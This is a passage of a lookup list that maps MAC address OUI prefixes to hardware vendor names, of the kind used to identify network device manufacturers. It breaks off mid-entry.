+000F9A Synchrony +000FA2 2xWireless +000E89 Clematic +000E82 Commtech Wireless +000E7C Televes +000E76 Gemsoc Innovision +000E6E MAT S.A. (Mircrelec Advanced Technology) +000E72 CTS electronics +000E68 E-TOP Network Technology +000E67 Eltis Microelectronics +000FE7 Lutron Electronics +000FEC Arkus +000FE0 NComputing +000FD4 Soundcraft +000FD9 FlexDSL Telecommunications AG +000EEA Shadong Luneng Jicheng Electronics,Co. +000EDD Shure Incorporated +000EE4 BOE Technology Group +000ED8 Positron Access Solutions +000ECD Skov A/S +000ECE S.I.T.T.I. +000ED3 Epicenter +000EC7 Motorola Korea +000F93 Landis+Gyr +000F94 Genexis BV +000F8E Dongyang Telecom +000F87 Maxcess International +000F82 Mortara Instrument +000F81 PAL Pacific +000F74 Qamcom Technology AB +000F7B Arce Sistemas +000F68 Vavic Network Technology +000F6F FTA Communication Technologies +000F62 Alcatel Bell Space N.V. +000F5C Day One Digital Media Limited +000F55 Datawire Communication Networks +000F49 Northover Solutions Limited +000F50 StreamScale Limited +000F42 Xalyo Systems +000F1C DigitAll World +000F0A Clear Edge Networks +000F09 Private +000F03 Com&c +000EF7 Vulcan Portals +000EFC Jtag Technologies +000EE9 WayTech Development +000EF0 Festo AG & KG +000F35 Cisco Systems +000F2E Megapower International +000F29 Augmentix +000F22 Helius +000F0F Real ID Technology +000F16 JAY HOW Technology +000F1B Ego Systems +000D74 Sand Network Systems +000D7B Consensys Computers +000D6E K-Patents Oy +000D68 Vinci Systems +000D6D K-Tech Devices +000D5B Smart Empire Investments Limited +000D5C Robert Bosch GmbH, Vt-atmo +000D61 Giga-Byte Technology +000D55 Sanycom Technology +000D49 Triton Systems of Delaware +000D4E NDR +000E5B ParkerVision - Direct2Data +000E55 Auvitran +000E56 4G Systems GmbH & KG +000E4F Trajet GmbH +000E48 Lipman TransAction Solutions +000E43 G-Tek Electronics Sdn. Bhd. +000E34 NexGen City +000E3B Hawking Technologies +000E2F Roche Diagnostics GmbH +000DFB Komax AG +000DE9 Napatech Aps +000DEE Andrew RF Power Amplifier Group +000DE2 CMZ Sistemi Elettronici +000DDC VAC +000DD6 ITI +000DDB Airwave Technologies +000DCA Tait Electronics +000DCF Cidra +000E28 Dynamic Ratings P/L +000E22 Private +000E21 MTU Friedrichshafen GmbH +000E15 Tadlys +000E1C Hach Company +000E0D Hesch Schrder GmbH +000E10 C-guys +000DF5 Teletronics International +000DFC Itfor +000E01 Asip Technologies +000CF0 M & N GmbH +000CF5 InfoExpress +000CE0 Trek Diagnostics +000CE4 NeuroCom International +000CE9 Bloomberg L.P. +000CCE Cisco Systems +000CD4 Positron Public Safety Systems +000CCD IEC - Tc57 +000D15 Voipac s.r.o. +000D16 UHS Systems +000D1B Kyoto Electronics Manufacturing +000D0F Finlux +000D03 Matrics +000D08 AboveCable +000CFC S2io Technologies +000CF6 Sitecom Europe BV +000DA3 Emerging Technologies Limited +000D9C Elan GmbH & KG +000D96 Vtera Technology +000D95 Opti-cell +000D90 Factum Electronics AB +000D89 Bils Technology +000D80 Online Development +000DC9 Thales Elektronik Systeme Gmbh +000DC3 First Communication +000DBC Cisco Systems +000DB7 Sanko Electric +000DB0 Olym-tech +000DA8 Teletronics Technology +000D41 Siemens AG ICM MP UC RD IT KLF1 +000D3A Microsoft +000D35 PAC International +000D2E Matsushita Avionics Systems +000D28 Cisco Systems +000D22 Unitronics +000D27 Microplex Printware AG +000C21 Faculty of Science and Technology, Keio University +000C11 Nippon Dempa +000C10 PNI +000C12 Micro-Optronic-Messtechnik GmbH +000C17 AJA Video Systems +000C04 Tecnova +000C0B Broadbus Technologies +000BF8 Infinera +000BFF Berkeley Camera Engineering +000BEC Nippon Electric Instrument +000BB8 Kihoku Electronic +000BBD Connexionz Limited +000BAD PC-PoS +000BA0 T&L Information +000BA7 Maranti Networks +000BAC 3Com +000B93 Ritter Elektronik +000B98 NiceTechVision +000B9B Sirius System +000B8C Flextronics +000BF1 LAP Laser Applikations +000BDF Shenzhen RouterD Networks Limited +000BDE Teldix Gmbh +000BE0 SercoNet +000BE5 Hims International +000BD9 General Hydrogen +000BAE Vitals System +000BD0 XiMeta Technology Americas +000BD5 Nvergence +000BC4 Biotronik Gmbh & +000BC9 Electroline Equipment +000BB1 Super Star Technology +000BB6 Metalligence Technology +000B79 X-COM +000B80 Lycium Networks +000B87 American Reliance +000B6D Solectron Japan Nakaniida +000B74 Kingwave Technology +000B67 Topview Technology +000B61 Friedrich Ltze GmbH & KG +000B66 Teralink Communications +000B68 Addvalue Communications Pte +000B58 Astronautics C.A +000B50 Oxygnet +000B44 Concord IDea +000B49 RF-Link System +000B4B Visiowave SA +000B31 Yantai ZhiYang Scientific and technology industry +000B3D Contal OK +000B38 Knrr GmbH +000B2A Howtel +000B2C Eiki Industrial +000C97 NV ADB TTV Technologies SA +000C9C Chongho information & communications +000C9E MemoryLink +000C89 AC Electric Vehicles +000C8B Connect Tech +000C90 Octasic +000C84 Eazix +000C75 Oriental integrated electronics. +000C77 Life Racing +000C7C Internet Information Image +000C43 Ralink Technology +000C45 Animation Technologies +000C3C MediaChorus +000C32 Avionic Design Development GmbH +000C35 KaVo Dental GmbH & KG +000C2B Elias Technology +000C28 Rifatron +000C1C MicroWeb +000C64 X2 MSA Group +000C69 National Radio Astronomy Observatory +000C70 ACC GmbH +000C51 Scientific Technologies +000C56 Megatel Computer (1986) +000C58 M&S Systems +000C5D Chic Technology (china) +000C4A Cygnus Microsystems (P) Limited +000CC8 Xytronix Research & Design +000CBB Iskraemeco +000CB5 Premier Technolgies +000CBC Iscutum +000CA3 Rancho Technology +000CAA Cubic Transportation Systems +000A38 Apani Networks +000A3F Data East +000A44 Avery Dennison Deutschland GmbH +000A46 ARO Welding Technologies SAS +000A33 Emulex +000A31 HCV Consulting +000A2C Active Tchnology +004252 RLX Technologies +000A2A QSI Systems +000A1E Red-M Products Limited +000A23 Parama Networks +000A17 Nestar Communications +000A1C Bridge Information +000B19 Vernier Networks +000B1E Kappa Opto-electronics Gmbh +000B25 Aeluros +000B17 MKS Instruments +000B12 Nuri Telecom +000B0B Corrent +000AFA Traverse Technologies Australia +000AFF Kilchherr Elektronik AG +000AF3 Cisco Systems +000AF8 American Telecare +000AEE GCD Hard- & Software GmbH +000A06 Teledex +000A09 TaraCom Integrated Products +000A0B Sealevel Systems +000A10 Fast Media Integrations AG +0009F7 SED, a division of Calian +000A01 Sohoware +0009E9 Cisco Systems +0009F0 Shimizu Technology +0009EA YEM +0009E4 K Tech Infosystem +0009D8 Flt Communications AB +0009DD Mavin Technology +0009B1 Kanematsu Electronics +0009A3 Leadfly Techologies +0009AA Data Comm for Business +0009A4 Hartec +00099E Testech +000992 InterEpoch Technology +000991 GE Fanuc Automation Manufacturing +00098B Entropic Communications +000AB0 Loytec Electronics Gmbh +000AB7 Cisco Systems +000AA4 Shanghai Surveillance Technology +000AA9 Brooks Automation GmbH +000A91 HemoCue AB +000A9D King Young Technology +000A8C Guardware Systems +000A97 Sonicblue +000A7D Valo +000A84 Rainsun Enterprise +000A89 Creval Systems +0009D7 DC Security Products +0009CA iMaxNetworks(Shenzhen)Limited. +0009D1 Seranoa Networks +0009C5 Kingene Technology +0009BD Epygi Technologies +0009B6 Cisco Systems +00097F Vsecure 2000 +000984 MyCasa Network +000971 Time Management +000978 Aiji System +000972 Securebase +00096C Imedia Semiconductor +000965 HyunJu Computer +000960 Yozan +000956 Network Systems Group, (NSG) +000955 Young Generation International +000AE9 AirVast Technology +000ADB SkyPilot Network +000ADD Allworx +000AE2 Binatone Electronics International +000ACA Yokoyama Shokai +000ACF Provideo Multimedia +000AD6 BeamReach Networks +000ABC Seabridge +000ABE Opnet Technologies +000AC3 eM Technics +000A78 Olitec +000A71 Avrio Technologies +000A76 Beida Jade Bird Huaguang Technology +000A63 DHD GmbH +000A65 GentechMedia.co. +000A6A SVM Microwaves s.r.o. +000A5E 3COM +000A52 AsiaRF +000A4B DataPower Technology +00075A Air Products and Chemicals +000754 Xyterra Computing +00074E Ipfront +00074D Zebra Technologies +000742 Ormazabal +000748 The Imaging Source Europe +000736 Data Video Technologies +00073D Nanjing Postel Telecommunications +00073C Telecom Design +00072A Innovance Networks +00072F Intransa +000730 Hutchison Optel Telecom Technology +000725 Bematech International +000818 Pixelworks +000812 GM-2 +000811 Voix +00080B Birka BPA Informationssystem AB +000805 Techno-Holon +00080C VDA Elettronica spa +0007FB Giga Stream Umts Technologies Gmbh +0007F5 Bridgeco AG +0007E8 EdgeWave +0007EF Lockheed Martin Tactical Systems +0007E2 Bitworks +0007D6 Commil +0007DC Atek +000923 Heaman System +00091D Proteam Computer +000924 Telebau GmbH +000911 Cisco Systems +000916 Listman Home Technologies +00090A SnedFar Technology +000904 Mondial Electronic +000903 Panasas +0008FE Unik C&C +0008EE Logic Product Development +0008F0 Next Generation Systems +000948 Vista Control Systems +00094F elmegt GmbH & KG +000943 Cisco Systems +00093C Jacques Technologies P/L +000936 Ipetronik GmbH & KG +000935 Sandvine Incorporated +000929 Sanyo Industries (UK) Limited +000930 AeroConcierge +0008E9 NextGig +0008DC Wiznet +0008E2 Cisco Systems +0008DB Corrigent Systems +0008D6 Hassnet +0008CF Nippon Koei Power Systems +0008C0 ASA Systems +0008C5 Liontech +0008CA TwinHan Technology +0008BF Aptus Elektronik AB +0008B3 Fastwel +0008B2 Shenzhen Compass Technology Development +0008A6 Multiware & Image +0008AD Toyo-Linx +00089A Alcatel Microelectronics +0008A0 Stotz Feinmesstechnik GmbH +000892 EM Solutions +000896 Printronix +00088C Quanta Network Systems +000886 Hansung Teliann +000873 DapTechnology +00087A Wipotec GmbH +00087F Spaun Electronic Gmbh & KG +02608C 3com +0007D0 Automat Engenharia de Automao Ltda. +0007CD Kumoh Electronic +0007C7 Synectics Systems Limited +00047D Pelco +00047E Siqura +0007C1 Overture Networks +0007C0 NetZerver +0007AE Britestream Networks +0007B4 Cisco Systems +00079A Verint Systems +0007A0 e-Watch +000794 Simple Devices +000793 Shin Satellite Public Company Limited +00078D NetEngines +00078E Garz & Friche GmbH +000781 Itron +000787 Idea System +000777 Motah +000771 Embedded System +00075B Gibson Guitars +000760 Tomis Information & Telecom +000767 Yuxing Electronics Company Limited +000879 CEM +00086C Plasmon LMS +00086D Missouri FreeNet +000867 Uptime Devices +000860 LodgeNet Entertainment +000854 Netronix +00085A IntiGate +00081E Repeatit AB +00082B Wooksung Electronics +000824 Nuance Document Imaging +0005BA Area Netwoeks +0005B9 Airvana +0005C0 Digital Network Alacarte +000599 DRS Test and Energy Management or DRS-TEM +0005A0 Mobiline Kft. +0005A9 Princeton Networks +0005AA Moore Industries International +0005AF InnoScan Computing A/S +0005B3 Asahi-Engineering +00059F Yotta Networks +0005A6 Extron Electronics +0005B4 Aceex +00058D Lynx Photonic Networks +000587 Locus, Incorporated +000593 Grammar Engine +000586 Lucent Technologies +00057A Overture Networks +00063C Intrinsyc Software International +00062F Pivotech Systems +000636 Jedai Broadband Networks +000635 PacketAir Networks +000628 Cisco Systems +00061F Vision Components GmbH +000619 Connection Technology Systems +00060D Wave7 Optics +000613 Kawasaki Microelectronics Incorporated +00060E Igys Systems +0005EC Mosaic Systems +0005D3 eProduction Solutions +000608 At-Sky SAS +000607 Omni Directional Control Technology +0005E6 Egenera +000580 FibroLAN +000576 NSM Technology +000570 Baydel +00056A Heuft Systemtechnik GmbH +000563 J-Works +00055D D-link Systems +000564 Tsinghua Bitway +000557 Agile TV +000551 F & S Elektronik Systeme GmbH +00054B Eaton Automation AG +00054A Ario Data Networks +000544 Valley Technologies +00053E KID Systeme GmbH +000531 Cisco Systems +000538 Merilus +000532 Cisco Systems +000525 Puretek Industrial +00052B Horiba +00051F Taijin Media +000519 Siemens Building Technologies AG +000518 Jupiters Technology +00050E 3ware +00050F Tanaka S/S +000508 Inetcam +0004FE Pelago Networks +000671 Softing AG +000672 Netezza +00067B Toplink C&C +000665 Sunny Giken +00066B Sysmex +000652 Cisco Systems +000659 EAL (Apeldoorn) +000658 Helmut Fischer GmbH Institut fr Elektronik und Messtechnik +000646 ShenZhen XunBao Network Technology +000640 White Rock Networks +00064C Invicta Networks +0006B5 Source Photonics +0006A8 KC Technology +00069E Uniqa +000698 egnite GmbH +000692 Intruvert Networks +00068C 3com +000685 NetNearU +00068B AirRunner Technologies +000686 Zardcom +00067F Digeo +0006DE Flash Technology +0006E4 Citel Technologies +0006D1 Tahoe Networks +0006DA Itran Communications +0006CB Jotron Electronics A/S +0006CC JMI Electronics +0006BB ATI Technologies +0006C5 Innovi Technologies Limited +0006AF Xalted Networks +000719 Mobiis +000720 Trutzschler GmbH & KG +000713 IP One +00070D Cisco Systems +000714 Brightcom +0006F1 Optillion +0006F0 Digeo +0006FB Hitachi Printing Solutions +0006EB Global Data +0005F2 Power R +0005FE Traficon N.V. +0005E5 Renishaw PLC +0005F8 Real Time Access +0005FF SNS Solutions +0005DD Cisco Systems +0005D9 Techno Valley +0005C6 Triz Communications +0005CC Sumtel Communications +00044C Jenoptik +000448 Polaroid +00043C Sonos +000441 Half Dome Systems +00042F International Communications Products +000429 Pixord +00041C ipDialog +00041D Corega of America +000416 Parks S/A Comunicacoes Digitais +000410 Spinnaker Networks +00040F Asus Network Technologies +00040A Sage Systems +000403 Nexsi +0004F8 Qualicable TV Industria E Com. +0004F2 Polycom +0004EB Paxonet Communications +0004EC Memobox SA +0004E6 Banyan Network Private Limited +0004E1 Infinior Microsystems +0004DB Tellus Group +0004E2 SMC Networks +0004D5 Hitachi Information & Communication Engineering +0004CF Seagate Technology +0004C9 Micro Electron +000487 Cogency Semiconductor +000482 Medialogic +000478 G. Star Technology +000471 IPrad +00046B Palm Wireless +000465 i.s.t isdn-support technik GmbH +000459 Veristar +00045E PolyTrax Information Technology AG +000458 Fusion X +000452 RocketLogix +000442 Nact +0003F9 Pleiades Communications +0003E2 Comspace +0003F4 NetBurner +0003F3 Dazzle Multimedia +0003ED Shinkawa Electric +0003E7 Logostek +0003DF Desana Systems +0003DB Apogee Electronics +0003D6 Radvision +0003CF Muxcom +0003C8 CML Emergency Services +0003C3 Micronik Multimedia +0003C0 Rftnc +0003BC COT GmbH +0003B1 Hospira +0003A5 Medea +0003AA Watlow +0003A2 Catapult Communications +000397 Watchfront Limited +00039E Tera System +000392 Hyundai Teletek +00038F Weinschel +00038B Plus-one I&T +000386 Ho Net +00037D Stellcom +000382 A-One +00037A Taiyo Yuden +000376 Graphtec Technology +000369 Nippon Antenna +00036F Telsey SPA +000363 Miraesys +00035E Metropolitan Area Networks +000357 Intervoice-Brite +00034C Shanghai DigiVision Technology +000351 Diebold +000311 Micro Technology +00030A Argus Technologies +000305 MSC Vertriebs GmbH +0002FE Viditec +0002F2 eDevice +0002F7 ARM +0002EC Maschoff Design Engineering +0002E4 JC Hyun Systems +0002E7 CAB GmbH & KG +0002E0 Etas Gmbh +0002D9 Reliable Controls +0002D4 PDA Peripherals +0002D1 Vivotek +0002CD TeleDream +000349 Vidicode Datacommunicatie +000340 Floware Wireless Systems +008037 Ericsson Group +000332 Cisco Systems +000339 Eurologic Systems +00032A UniData Communication Systems +00032D Ibase Technology +000326 Iwasaki Information Systems +00031D Taiwan Commate Computer +000318 Cyras Systems +0004C2 Magnipix +0004B6 Stratex Networks +0004BC Giantec +0004B0 Elesign +0004A9 SandStream Technologies +0004A8 Broadmax Technologies +0004A2 L.S.I. Japan +00049B Cisco Systems +00049C Surgient Networks +00048F TD Systems +000488 Eurotherm Controls +000281 Madge +009064 Thomson +00027F ask-technologies.com +00027A IOI Technology +000273 Coriolis Networks +00026E NeGeN Access +000263 UPS Manufacturing SRL +00025C SCI Systems (Kunshan) +000253 Televideo +00024C SiByte +00024E Datacard Group +00012F Twinhead International +00023C Creative Technology +000240 Seedek +000247 Great Dragon Information Technology (Group) +000243 Raysis +000239 Visicom +000236 Init Gmbh +000231 Ingersoll-Rand +00022A Asound Electronic +00022D Agere Systems +000219 Paralon Technologies +000186 Uwe Disch +00017B Heidelberger Druckmaschinen AG +000182 Dica Technologies AG +00018E Logitec +00019B Kyoto Microcomputer +000194 Capital Equipment +000197 Cisco Systems +0001A3 Genesys Logic +00014E WIN Enterprises +0030AC Systeme Lauer GmbH & +00013E Ascom Tateco AB +000145 Winsystems +000126 PAC Labs +00011A Hoffmann und Burmeister GbR +00011D Centillium Communications +000129 DFI +000107 Leiser GmbH +00010E Bri-Link Technologies +000116 Netspect Technologies +000103 3com +00062B Intraserver Technology +0002C1 Innovative Electronic Designs +0002C8 Technocom Communications Technology (pte) +0002A9 Racom, S.r.o. +0002B8 WHI Konsult AB +0002AC 3PAR data +0002B1 Anritsu +00029A Storage Apps +0002A0 Flatstack +000295 IP.Access Limited +000294 Tokyo Sokushin +000290 Woorigisool +000286 Occam Networks +00028B Vdsl Systems OY +000222 Chromisys +00021D Data General Communication +00020A Gefran Spa +000216 Cisco Systems +000206 Telital R&D Denmark A/S +000203 Woonsang Telecom +0001F7 Image Display Systems +0001EE Comtrol Europe +0001E2 Ando Electric +0001F1 Innovative Concepts +00B06D Jones Futurex +0030FE DSA GmbH +00305E Abelko Innovation +00301E 3com Europe +00304D ESI +003046 Controlled Electronic Manageme +00307B Cisco Systems +0001D6 manroland AG +0001DB Freecom Technologies GmbH +0001DE Trango Systems +0001CF Alpha Data Parallel Systems +0001CB EVR +0001C4 NeoWave +0001C0 CompuLab +0001B9 SKF Condition Monitoring +0001B5 Turin Networks +00017F Experience Music Project +00016C Foxconn +000173 Amcc +00015C Cadant +000163 Cisco Systems +00010A CIS Technology +00016F Inkel +000155 Promise Technology +000151 Ensemble Communications +000142 Cisco Systems +000132 Dranetz - BMI +00D07D Cosine Communications +00D0CA Intrinsyc Software International +00D058 Cisco Systems +00D067 Campio Communications +00D023 Infortrend Technology +00D02A Voxent Systems +00D068 Iwill +00D09D Veris Industries +00D09A Filanet +00D00A Lanaccess Telecom +00D04A Presence Technology Gmbh +00D0C3 Vivid Technology PTE +00D0F8 Fujian Star Terminal +00D096 3com Europe +00D003 Comda Enterprises +00D029 Wakefern Food +00D0F5 Orange Micro +00D0F7 Next Nets +00D078 Eltex of Sweden AB +00D0AF Cutler-hammer +00D026 Hirschmann Austria Gmbh +00D010 Convergent Networks +00D074 Taqua Systems +00D0D5 Grundig AG +00D034 Ormec Systems +00D08C Genoa Technology +00D059 Ambit Microsystems +005020 Mediastar +00503E Cisco Systems +00D02B Jetcell +005017 RSR S.r.l. +00D0CC Technologies Lyre +00506D Videojet Systems +005077 Prolific Technology +0050D4 Joohong Information & +00505E Digitek Micrologic +0050E7 Paradise Innovations (asia) +0050B9 Xitron Technologies +00D049 Impresstek +00D04D DIV OF Research & Statistics +00D035 Behavior TECH. Computer +00D02D Ademco +00D07C Koyo Electronics +00D05B Acroloop Motion Control +00D0C6 Thomas & Betts +00D02E Communication Automation +00D0DA Taicom Data Systems +00D0E8 MAC System +00D03C Vieo +00D09F Novtek Test Systems +00D07E Keycorp +00D0EA Nextone Communications +00D020 AIM System +00D064 Multitel +00D072 Broadlogic +00309B Smartware +0030AF Honeywell GmbH +003074 Equiinet +003090 Cyra Technologies +003030 Harmonix +00307C Adid SA +003063 Santera Systems +00309F Amber Networks +0030A8 Ol'e Communications +00304C Appian Communications +0030EF Neon Technology +00306F Seyeon TECH. +003031 Lightwave Communications +003035 Corning Incorporated +00302B Inalp Networks +00305F Hasselblad +00302D Quantum Bridge Communications +003025 Checkout Computer Systems +003012 Digital Engineering +003077 Onprem Networks +0030D4 AAE Systems +00D00F Speech Design Gmbh +00D0CF Moreton BAY +00D073 ACN Advanced Communications +00D030 Safetran Systems +00D057 Ultrak +00D03B Vision Products +00D0BF Pivotal Technologies +00D050 Iskratel +00D0CB Dasan +00D0D3 Cisco Systems +00D08E Grass Valley, A Belden Brand +00D0A3 Vocal DATA +00D0E0 Dooin Electronics +003054 Castlenet Technology +003039 Softbook Press +003017 BlueArc UK +003076 Akamba +00305D Digitra Systems +0030F7 Ramix +003033 Orient Telecom +003083 Ivron Systems +003007 OPTI +0030DD Indigita +0030F2 Cisco Systems +003020 TSI +003089 Spectrapoint Wireless +003022 Fong Kai Industrial +0030F8 Dynapro Systems +0030C2 Comone +003056 Beck IPC GmbH +0030D2 WIN Technologies +003050 Versa Technology +0030B8 RiverDelta Networks +00904D Spec +009079 ClearOne +00908F Audio Codes +0090D5 Euphonix +0090A7 Clientec +00907F WatchGuard Technologies +00907E Vetronix +00902F Netcore Systems +00900D Overland Storage +009044 Assured Digital +009078 MER Telemanagement Solutions +009009 I Controls +009015 Centigram Communications +0090F3 Aspect Communications +0090A8 NineTiles Networks +00507A Xpeed +005002 Omnisec AG +00508D Abit Computer +0050CD Digianswer A/S +0050C5 ADS Technologies +00502F TollBridge Technologies +005028 Aval Communications +00505B Kawasaki LSI U.s.a. +0050F8 Entrega Technologies +00506F G-connect +0050CC Xyratex +0050D5 AD Systems +0050AA Konica Minolta Holdings +00509C Beta Research +005027 Genicom +005010 NovaNET Learning +00509E Les Technologies SoftAcoustik +00505F Brand Innovators +005095 Peracom Networks +005026 Cosystems +0050EF SPE Systemhaus GmbH +005093 Boeing +0050D8 Unicorn Computer +009034 Imagic +009073 Gaio Technology +0090C9 Dpac Technologies +0090E7 Horsch Elektronik AG +009001 Nishimu Electronics Industries +0090FB Portwell +009070 NEO Networks +0090EF Integrix +0090B0 Vadem +0090D1 Leichu Enterprise +0050D7 Telstrat +0050F1 Intel +00501B ABL Canada +005036 Netcam +0050C9 Maspro Denkoh +005009 Philips Broadband Networks +0050C4 IMD +0050A3 TransMedia Communications +005099 3com Europe +0050A4 IO TECH +0050B3 Voiceboard +0050B7 Boser Technology +00908D Vickers Electronics Systems +009042 ECCS +009051 Ultimate Technology +0090FF Tellus Technology +009018 ITO Electric Industry +009002 Allgon AB +009016 ZAC +009005 Protech Systems +00901E Selesta Ingegneria +009090 I-bus +0090AA Indigo Active Vision Systems Limited +00903A Nihon Media Tool +009055 Parker Hannifin Compumotor Division +00909F Digi-data +0090E4 NEC America +009013 Samsan +009004 3com Europe +0090E1 Telena +00504A Elteco A.S. +00504C Galil Motion Control +005021 EIS International +00506E Corder Engineering +00507E Newer Technology +0050E6 Hakusan +0050AE FDK +00109D Clarinet Systems +0010D2 Nitto Tsushinki +001045 Nortel Networks +00106B Sonus Networks +0010EC RPCG +001092 Netcore +0010E2 ArrayComm +001071 Advanet +001069 Helioss Communications +0010FD Cocom A/S +0010AC Imci Technologies +0010EF Dbtel Incorporated +001017 Bosch Access Systems GmbH +001024 Nagoya Electric Works +0010DD Enable Semiconductor +0010C9 Mitsubishi Electronics Logistic Support +001085 Polaris Communications +001044 InnoLabs +001056 Sodick +001099 InnoMedia +001061 Hostlink +001093 CMS Computers +0010CD Interface Concept +0010F3 Nexcom International +001005 UEC Commercial +001066 Advanced Control Systems +0010E4 NSI +001062 NX Server +0010B9 Maxtor +00108B Laseranimation Sollinger Gmbh +00105C Quantum Designs (h.k.) +001042 Alacritech +001060 Billionton Systems +0010DE International Datacasting +00105D Draeger Medical +0010E1 S.I. TECH +001091 NO Wires Needed BV +0010F5 Amherst Systems +001090 Cimetrics +001070 Caradon Trend +0010BA Martinho-davis Systems +00107C P-com +0010AE Shinko Electric Industries +001040 Intermec +0010B0 Meridian Technology +001077 SAF Drive Systems +0010F4 Vertical Communications +001065 Radyne +00104A The Parvus +0010B3 Nokia Multimedia Terminals +001037 CYQ've Technology +001051 Cmicro +0010DC Micro-star International +0010EE CTI Products +00101B Cornet Technology +001032 Alta Technology +001025 Grayhill +0010F8 Texio Technology +00104D Surtec Industries +00E0E0 SI Electronics +00E0D1 Telsis Limited +00E005 Technical +00E072 Lynk +00E0C1 Memorex Telex Japan +00E0AD EES Technology +00E025 dit +00E0E4 Fanuc Robotics North America +00E031 Hagiwara Electric +00E0A5 ComCore Semiconductor +00E044 Lsics +00E05D Unitec +00E0B3 EtherWAN Systems +00E053 Cellport LABS +00E07D Netronix +00E0ED Silicom +00E0B4 Techno Scope +00E0C6 Link2it +00E06D Compuware +00E074 Tiernan Communications +00E059 Controlled Environments +00E006 Silicon Integrated SYS. +00E0F8 Dicna Control AB +00E004 Pmc-sierra +00E0DE Datax NV +00E078 Berkeley Networks +00E041 Cspi +00E0E2 Innova +00E009 Marathon Technologies +00E02F Mcns Holdings +00E04C Realtek Semiconductor +00E047 InFocus +00E092 Admtek Incorporated +00E0FF Security Dynamics Technologies +08BBCC Ak-nord EDV Vertriebsges. mbH +0060B2 Process Control +006004 Computadores Modulares SA +006000 Xycom +00A019 Nebula Consultants +00A0ED Brooks Automation +00A0A9 Navtel Communications +00A0E1 Westport Research Associates +00A0D6 SBE +00A05E Myriad Logic +00A078 Marconi Communications +00A00B Computex +00A09A Nihon Kohden America +00A095 Acacia Networks +00A0F2 Infotek Communications +00A0EF Lucidata +00A03F Computer Society Microprocessor & Microprocessor Standards C +00A067 Network Services Group +00A0A7 Vorax +00A02D 1394 Trade Association +00A0E6 Dialogic +00A04A Nisshin Electric +00A05B Marquip +00A08D Jacomo +00A08E Check Point Software Technologies +00E0AA Electrosonic +00E085 Global Maintech +00E05A Galea Network Security +00E0E7 Raytheon E-systems +00E00C Motorola +00E04A ZX Technologies +00E00A DIBA +00E0B9 Byas Systems +00E054 Kodai Hitec +00E0AF General Dynamics Information Systems +00605B IntraServer Technology +00604B Safe-com GmbH & KG +00A0CD DR. Johannes Heidenhain Gmbh +00A0DA Integrated Systems Technology +00A03C Eg&g Nuclear Instruments +00A038 Email Electronics +00A0BE Integrated Circuit Systems, Communications Group +00605D Scanivalve +0060E4 Compuserve +00600A Sord Computer +0060C4 Soliton Systems K.K. +0060C8 Kuka Welding Systems & Robots +006030 Village Tronic Entwicklung +0060E7 Randata +00602A Symicron Computer Communications +00601E Softlab +0060F8 Loran International Technologies +00609A NJK Techno +0060CC Emtrak, Incorporated +006036 AIT Austrian Institute of Technology GmbH +0060B9 NEC Platforms +0060CE Acclaim Communications +0060F5 Icon WEST +0060A4 GEW Technologies (PTY)Ltd +0060CA Harmonic Systems Incorporated +006024 Gradient Technologies +0060FB Packeteer +0060BC KeunYoung Electronics & Communication +0060B8 Corelis +0060FE Lynx System Developers +006001 InnoSys +00607D Sentient Networks +00606E Davicom Semiconductor +00607E Gigalabs +0060CF Alteon Networks +006026 Viking Modular Solutions +006003 Teraoka Weigh System PTE +006059 Technical Communications +006066 Lacroix Trafic +0060DA Red Lion Controls +006042 TKS (usa) +00A023 Applied Creative Technology +00A00F Broadband Technologies +00A032 GES Singapore PTE. +002034 Rotec Industrieautomation Gmbh +0020B2 GKD Gesellschaft Fur Kommunikation Und Datentechnik +002004 Yamatake-honeywell +0020FE Topware / Grand Computer +002073 Fusion Systems +00207A WiSE Communications +00205C InterNet Systems of Florida +00207E Finecom +00205A Computer Identics +0020E4 Hsing Tech Enterprise +00A000 Centillion Networks +00A07B Dawn Computer Incorporation +00A05C Inventory Conversion +00206F Flowpoint +0020DF Kyosan Electric MFG. +002010 Jeol System Technology +002020 Megatron Computer Industries +002037 Seagate Technology +0020A0 OA Laboratory +00C0A3 Dual Enterprises +0070B0 M/a-com Companies +009D8E Cardiac Recorders +006086 Logic Replacement TECH. +001C7C Perq Systems +00C059 Denso +00C0A9 Barron Mccann +00C069 Axxcelera Broadband Wireless +00C019 Leap Technology +00A062 AES Prodata +00A008 Netcorp +00A01B Premisys Communications +00A04B TFL LAN +00A015 Wyle +00A011 Mutoh Industries +00A0B6 Sanritz Automation +00A0DD Azonix +00A00A Airspan +00A03B Toshin Electric +00A0F3 Staubli +00A097 JC Information Systems +00A082 NKT Elektronik A/S +00A072 Ovation Systems +00A0B2 Shima Seiki +00A0E5 NHC Communications +00A0D3 Instem Computer Systems +00A0BA Patton Electronics +00A0B4 Texas Microsystems +00A0AF WMS Industries +00A0FE Boston Technology +00202F Zeta Communications +002060 Alcatel Italia +00209A THE 3DO Company +00205E Castle ROCK +00207C Autec Gmbh +002075 Motorola Communication Israel +002015 Actis Computer SA +0020E9 Dantel +00204A Pronet Gmbh +002029 Teleprocessing Products +002051 Verilink +0020A1 Dovatron +002024 Pacific Communication Sciences +00209D Lippert Automationstechnik +002041 Data NET +002076 Reudo +00206E XACT +0020CA Digital Ocean +002085 Eaton +0020CD Hybrid Networks +0020E7 B&W Nuclear Service Company +0020AC Interflex Datensysteme Gmbh +0020F6 NET TEK AND Karlnet +0020D3 OST (ouest Standard Telematiqu +0020D8 Nortel Networks +002017 Orbotech +002025 Control Technology +00C08B Risq Modular Systems +00C0CD Comelta +00C04B Creative Microsystems +00C0A1 Tokyo Denshi Sekei +00C03E FA. GEBR. Heller Gmbh +00C0E1 Sonic Solutions +00C047 Unimicro Systems +00C046 Blue Chip Technology +00C00D Advanced Logic Research +00C0FA Canary Communications +00C0B7 American Power Conversion +00C0BA Netvantage +00C0B6 Overland Storage +00C048 BAY Technical Associates +00C03F Stores Automated Systems +00C00E Psitech +00C036 Raytech Electronic +00C009 KT Technology (S) PTE +00C0EA Array Technology +00C03A Men-mikro Elektronik Gmbh +00C040 Ecci +00C04C Department OF Foreign Affairs +00C01C Interlink Communications +00C086 THE Lynk +00C08D Tronix Product Development +00C0A2 Intermedium A/S +00C070 Sectra Secure-transmission AB +00C057 Myco Electronics +00C0DF KYE Systems +00C0F6 Celan Technology +00C012 Netspan +00C0C4 Computer Operational +00C0C2 Infinite Networks +00C0D3 Olympus Image Systems +00C0B0 GCC Technologies +00C0F4 Interlink System +00C0E2 Calcomp +00C0CA ALFA +00C07B Ascend Communications +00C052 Burr-brown +00C0BE Alcatel - SEL +00408F Wm-data Minfo AB +0040B7 Stealth Computer Systems +004057 Lockheed - Sanders +004017 Silex Technology America +004087 